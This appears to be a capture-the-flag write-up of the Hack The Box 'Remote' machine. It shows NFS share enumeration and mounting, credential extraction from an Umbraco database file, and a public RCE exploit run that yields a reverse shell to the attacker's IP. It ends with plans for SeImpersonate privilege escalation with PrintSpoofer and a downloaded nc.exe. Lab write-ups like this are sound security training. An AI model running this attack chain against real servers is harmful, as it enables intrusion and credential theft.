┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
NFS
I Found 2049 port open which is used by network file system (NFS), So I'll check if there is any accessible folders
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip
Export list for 10.10.10.180:
/site_backups (everyone)
I Found an interesting folder, So I'll mount it to my host and see its content
──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers App_Plugins Global.asax Umbraco Views aspnet_client css scripts
App_Data Config Media Umbraco_Client Web.config bin default.aspx
I tried to hunt for usernames & passwords, but nothing appears using grep command, So I searched online for Umbraco CMS and where it stores its credentials and I found this:
The CMS stores its credentials in Umbraco.sdf. After knowing this, I tried to open the file with text editor but it's binary file, so I list its content with strings and grep for credentials
I searched for poc on GitHub this match the version of the webapp and found this one:
I clone it locally and run the exploit
┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv>
PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx
User flag 442f18b8accdec694dxxxxxxxxxxx
Privilege Escalation
When I typed whoami command and saw the output, I knew it's an easy win cause user iis apppool\defaultapppool often has SeImpersonatePrivilege which can be used to escalate to system using RoguePotato or PrintSpoofer
PS C:\Users\Public> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
I downloaded PrintSpoofer.exe & nc.exe from my attack host